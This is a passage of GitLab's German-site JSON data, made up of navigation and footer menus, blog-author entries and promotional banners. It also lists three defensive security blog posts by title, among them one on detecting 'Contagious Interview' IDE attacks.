anzeigen",{"href":1204,"dataGaName":1199,"dataGaLocation":1043},"/de-de/resources/",[1206,1239,1261],{"title":1207,"items":1208},"Erste Schritte",[1209,1214,1219,1224,1229,1234],{"text":1210,"config":1211},"Installieren",{"href":1212,"dataGaName":1213,"dataGaLocation":1043},"/de-de/install/","install",{"text":1215,"config":1216},"Kurzanleitungen",{"href":1217,"dataGaName":1218,"dataGaLocation":1043},"/de-de/get-started/","quick setup checklists",{"text":1220,"config":1221},"Lernen",{"href":1222,"dataGaLocation":1043,"dataGaName":1223},"https://university.gitlab.com/","learn",{"text":1225,"config":1226},"Produktdokumentation",{"href":1227,"dataGaName":1228,"dataGaLocation":1043},"https://docs.gitlab.com/","product documentation",{"text":1230,"config":1231},"Best-Practice-Videos",{"href":1232,"dataGaName":1233,"dataGaLocation":1043},"/de-de/getting-started-videos/","best practice videos",{"text":1235,"config":1236},"Integrationen",{"href":1237,"dataGaName":1238,"dataGaLocation":1043},"/de-de/integrations/","integrations",{"title":1240,"items":1241},"Entdecken",[1242,1247,1252,1256],{"text":1243,"config":1244},"Kundenerfolge",{"href":1245,"dataGaName":1246,"dataGaLocation":1043},"/de-de/customers/","customer success stories",{"text":1248,"config":1249},"Blog",{"href":1250,"dataGaName":1251,"dataGaLocation":1043},"/de-de/blog/","blog",{"text":1253,"config":1254},"The Source",{"href":1255,"dataGaName":1251,"dataGaLocation":1043},"/de-de/the-source/",{"text":1257,"config":1258},"Remote",{"href":1259,"dataGaName":1260,"dataGaLocation":1043},"https://handbook.gitlab.com/handbook/company/culture/all-remote/","remote",{"title":1262,"items":1263},"Vernetzen",[1264,1269,1274,1279,1284],{"text":1265,"config":1266},"GitLab-Services",{"href":1267,"dataGaName":1268,"dataGaLocation":1043},"/de-de/services/","services",{"text":1270,"config":1271},"Community",{"href":1272,"dataGaName":1273,"dataGaLocation":1043},"/community/","community",{"text":1275,"config":1276},"Forum",{"href":1277,"dataGaName":1278,"dataGaLocation":1043},"https://forum.gitlab.com/","forum",{"text":1280,"config":1281},"Veranstaltungen",{"href":1282,"dataGaName":1283,"dataGaLocation":1043},"/events/","events",{"text":1285,"config":1286},"Partner",{"href":1287,"dataGaName":1288,"dataGaLocation":1043},"/de-de/partners/","partners",{"config":1290,"title":1293,"text":1294,"link":1295},{"background":1291,"textColor":1292},"url('https://res.cloudinary.com/about-gitlab-com/image/upload/v1777322348/qpq8yrgn8knii57omj0c.png')","#000","Neues bei GitLab","Über die neuesten Funktionen und Verbesserungen auf dem Laufenden bleiben.",{"text":1296,"config":1297},"Aktuelle Nachrichten",{"href":1298,"dataGaName":1299,"dataGaLocation":1043},"/de-de/whats-new/","whats new",{"text":1301,"config":1302,"menu":1304},"Company",{"dataNavLevelOne":1303},"company",{"type":1094,"columns":1305},[1306],{"items":1307},[1308,1313,1319,1321,1326,1331,1336,1341,1346,1351],{"text":1309,"config":1310},"Über",{"href":1311,"dataGaName":1312,"dataGaLocation":1043},"/de-de/company/","about",{"text":1314,"config":1315,"footerGa":1318},"Karriere",{"href":1316,"dataGaName":1317,"dataGaLocation":1043},"/jobs/","jobs",{"dataGaName":1317},{"text":1280,"config":1320},{"href":1282,"dataGaName":1283,"dataGaLocation":1043},{"text":1322,"config":1323},"Geschäftsführung",{"href":1324,"dataGaName":1325,"dataGaLocation":1043},"/company/team/e-group/","leadership",{"text":1327,"config":1328},"Handbuch",{"href":1329,"dataGaName":1330,"dataGaLocation":1043},"https://handbook.gitlab.com/","handbook",{"text":1332,"config":1333},"Investor Relations",{"href":1334,"dataGaName":1335,"dataGaLocation":1043},"https://ir.gitlab.com/","investor relations",{"text":1337,"config":1338},"Trust Center",{"href":1339,"dataGaName":1340,"dataGaLocation":1043},"/de-de/security/","trust center",{"text":1342,"config":1343},"AI Transparency Center",{"href":1344,"dataGaName":1345,"dataGaLocation":1043},"/de-de/ai-transparency-center/","ai transparency center",{"text":1347,"config":1348},"Newsletter",{"href":1349,"dataGaName":1350,"dataGaLocation":1043},"/company/contact/#contact-forms","newsletter",{"text":1352,"config":1353},"Presse",{"href":1354,"dataGaName":1355,"dataGaLocation":1043},"/press/","press",{"text":1357,"config":1358,"menu":1359},"Kontakt",{"dataNavLevelOne":1303},{"type":1094,"columns":1360},[1361],{"items":1362},[1363,1366,1371],{"text":1050,"config":1364},{"href":1052,"dataGaName":1365,"dataGaLocation":1043},"talk to sales",{"text":1367,"config":1368},"Support-Portal",{"href":1369,"dataGaName":1370,"dataGaLocation":1043},"https://support.gitlab.com","support portal",{"text":1372,"config":1373},"Kundenportal",{"href":1374,"dataGaName":1375,"dataGaLocation":1043},"https://customers.gitlab.com/customers/sign_in/","customer portal",{"close":1377,"login":1378,"suggestions":1385},"Schließen",{"text":1379,"link":1380},"Um Repositorys und Projekte zu durchsuchen, melde dich an bei",{"text":1381,"config":1382},"gitlab.com",{"href":1057,"dataGaName":1383,"dataGaLocation":1384},"search login","search",{"text":1386,"default":1387},"Vorschläge",[1388,1390,1395,1397,1402,1407],{"text":1074,"config":1389},{"href":1079,"dataGaName":1074,"dataGaLocation":1384},{"text":1391,"config":1392},"Codevorschläge (KI)",{"href":1393,"dataGaName":1394,"dataGaLocation":1384},"/de-de/solutions/code-suggestions/","Code Suggestions (AI)",{"text":1110,"config":1396},{"href":1112,"dataGaName":1110,"dataGaLocation":1384},{"text":1398,"config":1399},"GitLab auf AWS",{"href":1400,"dataGaName":1401,"dataGaLocation":1384},"/de-de/partners/technology-partners/aws/","GitLab on AWS",{"text":1403,"config":1404},"GitLab auf Google Cloud",{"href":1405,"dataGaName":1406,"dataGaLocation":1384},"/de-de/partners/technology-partners/google-cloud-platform/","GitLab on Google Cloud",{"text":1082,"config":1408},{"href":1087,"dataGaName":1409,"dataGaLocation":1384},"Why GitLab?",{"freeTrial":1411,"mobileIcon":1416,"desktopIcon":1421,"secondaryButton":1424},{"text":1412,"config":1413},"Kostenlos testen",{"href":1414,"dataGaName":1048,"dataGaLocation":1415},"https://gitlab.com/-/trials/new/","nav",{"altText":1417,"config":1418},"GitLab-Symbol",{"src":1419,"dataGaName":1420,"dataGaLocation":1415},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758203874/jypbw1jx72aexsoohd7x.svg","gitlab icon",{"altText":1417,"config":1422},{"src":1423,"dataGaName":1420,"dataGaLocation":1415},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758203875/gs4c8p8opsgvflgkswz9.svg",{"text":1207,"config":1425},{"href":1426,"dataGaName":1427,"dataGaLocation":1415},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com/de-de/get-started/","get started",{"freeTrial":1429,"mobileIcon":1433,"desktopIcon":1435},{"text":1430,"config":1431},"Mehr über GitLab Duo erfahren",{"href":1079,"dataGaName":1432,"dataGaLocation":1415},"gitlab duo",{"altText":1417,"config":1434},{"src":1419,"dataGaName":1420,"dataGaLocation":1415},{"altText":1417,"config":1436},{"src":1423,"dataGaName":1420,"dataGaLocation":1415},{"button":1438,"mobileIcon":1443,"desktopIcon":1445},{"text":1439,"config":1440},"/Option",{"href":1441,"dataGaName":1442,"dataGaLocation":1415},"#contact","switch",{"altText":1417,"config":1444},{"src":1419,"dataGaName":1420,"dataGaLocation":1415},{"altText":1417,"config":1446},{"src":1447,"dataGaName":1420,"dataGaLocation":1415},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1773335277/ohhpiuoxoldryzrnhfrh.png",{"freeTrial":1449,"mobileIcon":1454,"desktopIcon":1456},{"text":1450,"config":1451},"Zurück zur Preisübersicht",{"href":1194,"dataGaName":1452,"dataGaLocation":1415,"icon":1453},"back to pricing","GoBack",{"altText":1417,"config":1455},{"src":1419,"dataGaName":1420,"dataGaLocation":1415},{"altText":1417,"config":1457},{"src":1423,"dataGaName":1420,"dataGaLocation":1415},{"title":1459,"button":1460,"config":1465},"Sieh dir an, wie agentische KI die Softwarebereitstellung transformiert",{"text":1461,"config":1462},"Jetzt live bei GitLab Transcend am 10. Juni dabei sein",{"href":1463,"dataGaName":1464,"dataGaLocation":1043},"/de-de/events/transcend/virtual/","transcend event",{"layout":1466,"disabled":1030},"release",{"data":1468},{"text":1469,"source":1470,"edit":1476,"contribute":1481,"config":1486,"items":1491,"minimal":1697},"Git ist eine Marke von Software Freedom Conservancy und unsere Verwendung von „GitLab“ erfolgt unter Lizenz.",{"text":1471,"config":1472},"Quelltext der Seite anzeigen",{"href":1473,"dataGaName":1474,"dataGaLocation":1475},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/","page source","footer",{"text":1477,"config":1478},"Diese Seite bearbeiten",{"href":1479,"dataGaName":1480,"dataGaLocation":1475},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/content/","web ide",{"text":1482,"config":1483},"Beteilige dich",{"href":1484,"dataGaName":1485,"dataGaLocation":1475},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/CONTRIBUTING.md/","please contribute",{"twitter":1487,"facebook":1488,"youtube":1489,"linkedin":1490},"https://x.com/gitlab","https://www.facebook.com/gitlab","https://www.youtube.com/channel/UCnMGQ8QHMAnVIsI3xJrihhg","https://www.linkedin.com/company/gitlab-com",[1492,1537,1590,1632,1663],{"title":1192,"links":1493,"subMenu":1508},[1494,1498,1503],{"text":1495,"config":1496},"Tarife anzeigen",{"href":1194,"dataGaName":1497,"dataGaLocation":1475},"view plans",{"text":1499,"config":1500},"Vorteile von Premium",{"href":1501,"dataGaName":1502,"dataGaLocation":1475},"/de-de/pricing/premium/","why premium",{"text":1504,"config":1505},"Vorteile von Ultimate",{"href":1506,"dataGaName":1507,"dataGaLocation":1475},"/de-de/pricing/ultimate/","why ultimate",[1509],{"title":1357,"links":1510},[1511,1513,1515,1517,1522,1527,1532],{"text":1050,"config":1512},{"href":1052,"dataGaName":1053,"dataGaLocation":1475},{"text":1367,"config":1514},{"href":1369,"dataGaName":1370,"dataGaLocation":1475},{"text":1372,"config":1516},{"href":1374,"dataGaName":1375,"dataGaLocation":1475},{"text":1518,"config":1519},"Status",{"href":1520,"dataGaName":1521,"dataGaLocation":1475},"https://status.gitlab.com/","status",{"text":1523,"config":1524},"Nutzungsbedingungen",{"href":1525,"dataGaName":1526,"dataGaLocation":1475},"/terms/","terms of use",{"text":1528,"config":1529},"Datenschutzerklärung",{"href":1530,"dataGaName":1531,"dataGaLocation":1475},"/de-de/privacy/","privacy statement",{"text":1533,"config":1534},"Cookie-Einstellungen",{"dataGaName":1535,"dataGaLocation":1475,"id":1536,"isOneTrustButton":1024},"cookie preferences","ot-sdk-btn",{"title":1090,"links":1538,"subMenu":1547},[1539,1543],{"text":1540,"config":1541},"DevSecOps-Plattform",{"href":1072,"dataGaName":1542,"dataGaLocation":1475},"devsecops platform",{"text":1544,"config":1545},"KI-unterstützte Entwicklung",{"href":1079,"dataGaName":1546,"dataGaLocation":1475},"ai-assisted development",[1548],{"title":1549,"links":1550},"Themen",[1551,1555,1560,1565,1570,1575,1580,1585],{"text":1110,"config":1552},{"href":1553,"dataGaName":1554,"dataGaLocation":1475},"/de-de/topics/ci-cd/","cicd",{"text":1556,"config":1557},"GitOps",{"href":1558,"dataGaName":1559,"dataGaLocation":1475},"/de-de/topics/gitops/","gitops",{"text":1561,"config":1562},"DevOps",{"href":1563,"dataGaName":1564,"dataGaLocation":1475},"/de-de/topics/devops/","devops",{"text":1566,"config":1567},"Versionskontrolle",{"href":1568,"dataGaName":1569,"dataGaLocation":1475},"/de-de/topics/version-control/","version control",{"text":1571,"config":1572},"DevSecOps",{"href":1573,"dataGaName":1574,"dataGaLocation":1475},"/de-de/topics/devsecops/","devsecops",{"text":1576,"config":1577},"Cloud-nativ",{"href":1578,"dataGaName":1579,"dataGaLocation":1475},"/de-de/topics/cloud-native/","cloud native",{"text":1581,"config":1582},"KI für das Programmieren",{"href":1583,"dataGaName":1584,"dataGaLocation":1475},"/de-de/topics/devops/ai-for-coding/","ai for coding",{"text":1586,"config":1587},"Agentische KI",{"href":1588,"dataGaName":1589,"dataGaLocation":1475},"/de-de/topics/agentic-ai/","agentic ai",{"title":1591,"links":1592},"Lösungen",[1593,1596,1598,1603,1607,1610,1613,1616,1618,1620,1622,1627],{"text":1135,"config":1594},{"href":1130,"dataGaName":1595,"dataGaLocation":1475},"Application Security Testing",{"text":1122,"config":1597},{"href":1106,"dataGaName":1107,"dataGaLocation":1475},{"text":1599,"config":1600},"Agile Entwicklung",{"href":1601,"dataGaName":1602,"dataGaLocation":1475},"/de-de/solutions/agile-delivery/","agile delivery",{"text":1604,"config":1605},"SCM",{"href":1119,"dataGaName":1606,"dataGaLocation":1475},"source code management",{"text":1110,"config":1608},{"href":1112,"dataGaName":1609,"dataGaLocation":1475},"continuous integration & delivery",{"text":1161,"config":1611},{"href":1163,"dataGaName":1612,"dataGaLocation":1475},"value stream management",{"text":1556,"config":1614},{"href":1615,"dataGaName":1559,"dataGaLocation":1475},"/de-de/solutions/gitops/",{"text":1174,"config":1617},{"href":1177,"dataGaName":1178,"dataGaLocation":1475},{"text":1180,"config":1619},{"href":1183,"dataGaName":1184,"dataGaLocation":1475},{"text":1186,"config":1621},{"href":1189,"dataGaName":1190,"dataGaLocation":1475},{"text":1623,"config":1624},"Bildungswesen",{"href":1625,"dataGaName":1626,"dataGaLocation":1475},"/de-de/solutions/education/","education",{"text":1628,"config":1629},"Finanzdienstleistungen",{"href":1630,"dataGaName":1631,"dataGaLocation":1475},"/de-de/solutions/finance/","financial services",{"title":1197,"links":1633},[1634,1636,1638,1640,1643,1645,1648,1650,1652,1655,1657,1659,1661],{"text":1210,"config":1635},{"href":1212,"dataGaName":1213,"dataGaLocation":1475},{"text":1215,"config":1637},{"href":1217,"dataGaName":1218,"dataGaLocation":1475},{"text":1220,"config":1639},{"href":1222,"dataGaName":1223,"dataGaLocation":1475},{"text":1225,"config":1641},{"href":1227,"dataGaName":1642,"dataGaLocation":1475},"docs",{"text":1248,"config":1644},{"href":1250,"dataGaName":1251,"dataGaLocation":1475},{"text":1646,"config":1647},"Neuigkeiten",{"href":1298,"dataGaName":1299,"dataGaLocation":1475},{"text":1243,"config":1649},{"href":1245,"dataGaName":1246,"dataGaLocation":1475},{"text":1257,"config":1651},{"href":1259,"dataGaName":1260,"dataGaLocation":1475},{"text":1653,"config":1654},"GitLab Services",{"href":1267,"dataGaName":1268,"dataGaLocation":1475},{"text":1270,"config":1656},{"href":1272,"dataGaName":1273,"dataGaLocation":1475},{"text":1275,"config":1658},{"href":1277,"dataGaName":1278,"dataGaLocation":1475},{"text":1280,"config":1660},{"href":1282,"dataGaName":1283,"dataGaLocation":1475},{"text":1285,"config":1662},{"href":1287,"dataGaName":1288,"dataGaLocation":1475},{"title":1664,"links":1665},"Unternehmen",[1666,1668,1670,1672,1674,1676,1681,1686,1688,1690,1692],{"text":1309,"config":1667},{"href":1311,"dataGaName":1303,"dataGaLocation":1475},{"text":1314,"config":1669},{"href":1316,"dataGaName":1317,"dataGaLocation":1475},{"text":1322,"config":1671},{"href":1324,"dataGaName":1325,"dataGaLocation":1475},{"text":1327,"config":1673},{"href":1329,"dataGaName":1330,"dataGaLocation":1475},{"text":1332,"config":1675},{"href":1334,"dataGaName":1335,"dataGaLocation":1475},{"text":1677,"config":1678},"Nachhaltigkeit",{"href":1679,"dataGaName":1680,"dataGaLocation":1475},"/sustainability/","Sustainability",{"text":1682,"config":1683},"Vielfalt, Inklusion und Zugehörigkeit",{"href":1684,"dataGaName":1685,"dataGaLocation":1475},"/de-de/diversity-inclusion-belonging/","Diversity, inclusion and belonging",{"text":1337,"config":1687},{"href":1339,"dataGaName":1340,"dataGaLocation":1475},{"text":1347,"config":1689},{"href":1349,"dataGaName":1350,"dataGaLocation":1475},{"text":1352,"config":1691},{"href":1354,"dataGaName":1355,"dataGaLocation":1475},{"text":1693,"config":1694},"Transparenzerklärung zu moderner Sklaverei",{"href":1695,"dataGaName":1696,"dataGaLocation":1475},"https://handbook.gitlab.com/handbook/legal/modern-slavery-act-transparency-statement/","modern slavery transparency statement",{"items":1698},[1699,1701,1704],{"text":1523,"config":1700},{"href":1525,"dataGaName":1526,"dataGaLocation":1475},{"text":1702,"config":1703},"Cookies",{"dataGaName":1535,"dataGaLocation":1475,"id":1536,"isOneTrustButton":1024},{"text":1528,"config":1705},{"href":1530,"dataGaName":1531,"dataGaLocation":1475},[1707,1721],{"id":1708,"title":7,"body":1023,"config":1709,"content":1711,"description":1023,"extension":1715,"meta":1716,"navigation":1024,"path":1717,"seo":1718,"stem":1719,"__hash__":1720},"blogAuthors/en-us/blog/authors/dinesh-bolkensteyn.yml",{"template":1710},"BlogAuthor",{"name":7,"config":1712},{"headshot":1713,"ctfId":1714},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1781016491/cs30c757njvhqnyizzmn.jpg","EpylYWgjPmFOL5NX3Zxmk","yml",{},"/en-us/blog/authors/dinesh-bolkensteyn",{},"en-us/blog/authors/dinesh-bolkensteyn","Pv3nFIJV4WoNXz6FcpkaLOBx8QTtXH1KIVGmxt1GGME",{"id":1722,"title":8,"body":1023,"config":1723,"content":1725,"description":1023,"extension":1715,"meta":1728,"navigation":1024,"path":1729,"seo":1730,"stem":1731,"__hash__":1732},"blogAuthors/en-us/blog/authors/daniel-abeles.yml",{"template":1710,"gitlabHandle":1724},"dabeles",{"name":8,"config":1726},{"headshot":1727},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1764021550/s0jlolynjykik4qzfznr.png",{},"/en-us/blog/authors/daniel-abeles",{},"en-us/blog/authors/daniel-abeles","Jk9qNn2qJBh633zCEZSFpYFUYNt83twJ-Ge9wrn_oT0",[1734,1743,1750],{"title":1735,"description":1736,"heroImage":1737,"category":1019,"date":1738,"authors":1739,"slug":1742,"externalUrl":1023},"Contagious Interview: IDE-Angriffe erkennen und verhindern","Benutzerdefinierte Kontrollen zur Erkennung und Prävention von Malware-Kampagnen wie Contagious Interview – und Deployment in der eigenen Umgebung.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1774375772/kpaaaiqhokevxxeoxvu0.png","2026-05-04",[1740,1741],"Josh Feehs","Austin Bollinger","how-to-detect-and-prevent-contagious-interview-ide-attacks",{"title":1744,"description":1745,"heroImage":1025,"category":1019,"date":1746,"authors":1747,"slug":1749,"externalUrl":1023},"Pipeline-Sicherheit: Lehren aus den Supply-Chain-Angriffen im März","Erfahre, wie zentrale Pipeline-Policies die Angriffsmuster hinter einer Reihe aktueller Supply-Chain-Attacken erkennen und blockieren können.","2026-04-07",[1748],"Grant Hickman","pipeline-security-lessons-from-march-supply-chain-incidents",{"title":1751,"description":1752,"heroImage":1753,"category":1019,"date":1754,"authors":1755,"slug":1757,"externalUrl":1023},"Detection-Gaps automatisch analysieren mit GitLab Duo Agent Platform","GitLab zeigt, wie zwei KI-Agenten die Gap-Analyse nach Sicherheitsvorfällen reproduzierbar und konsistent machen – direkt im GitLab-Workflow.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1773147991/op5xyroonltdwqix0x3u.png","2026-03-10",[1756],"Matt Coons","automating-detection-gap-analysis-with-gitlab-duo-agent-platform",{"promotions":1759},[1760,1774,1786,1797],{"id":1761,"categories":1762,"header":1764,"text":1765,"button":1766,"image":1771},"ai-modernization",[1763],"ai","Hält KI, was uns versprochen wurde?","Das Quiz dauert maximal 5 Minuten.",{"text":1767,"config":1768},"Ermittle deinen KI-Reifegrad",{"href":1769,"dataGaName":1770,"dataGaLocation":1251},"/de-de/assessments/ai-modernization-assessment/","modernization assessment",{"config":1772},{"src":1773},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138786/qix0m7kwnd8x2fh1zq49.png",{"id":1775,"categories":1776,"header":1778,"text":1765,"button":1779,"image":1783},"devops-modernization",[1777,1574],"product","Verwaltest du Tool-Chaos oder stellst du Innovationen bereit?",{"text":1780,"config":1781},"Ermittle deinen DevOps-Reifegrad",{"href":1782,"dataGaName":1770,"dataGaLocation":1251},"/de-de/assessments/devops-modernization-assessment/",{"config":1784},{"src":1785},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138785/eg818fmakweyuznttgid.png",{"id":1787,"categories":1788,"header":1789,"text":1765,"button":1790,"image":1794},"security-modernization",[1034],"Tauschst du Schnelligkeit gegen Sicherheit ein?",{"text":1791,"config":1792},"Ermittle deinen Sicherheitsreifegrad",{"href":1793,"dataGaName":1770,"dataGaLocation":1251},"/de-de/assessments/security-modernization-assessment/",{"config":1795},{"src":1796},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138786/p4pbqd9nnjejg5ds6mdk.png",{"id":1798,"paths":1799,"header":1802,"text":1803,"button":1804,"image":1809},"github-azure-migration",[1800,1801],"migration-from-azure-devops-to-gitlab","integrating-azure-devops-scm-and-gitlab","Ist dein Team bereit für den Umzug von GitHub nach Azure?","GitHub stellt bereits auf Azure um. Finde heraus, was das für dich bedeutet.",{"text":1805,"config":1806},"Erfahre, wie GitLab im Vergleich zu GitHub abschneidet",{"href":1807,"dataGaName":1808,"dataGaLocation":1251},"/de-de/compare/gitlab-vs-github/github-azure-migration/","github azure migration",{"config":1810},{"src":1785},{"header":1812,"blurb":1813,"button":1814,"secondaryButton":1819},"Beginne noch heute, schneller zu entwickeln","Entdecke, was dein Team mit der intelligenten Orchestrierungsplattform für DevSecOps erreichen kann.\n",{"text":1815,"config":1816},"Kostenlosen Test starten",{"href":1817,"dataGaName":1048,"dataGaLocation":1818},"https://gitlab.com/-/trial_registrations/new?glm_content=default-saas-trial&glm_source=about.gitlab.com/de-de/","feature",{"text":1050,"config":1820},{"href":1052,"dataGaName":1053,"dataGaLocation":1818},1781392741957]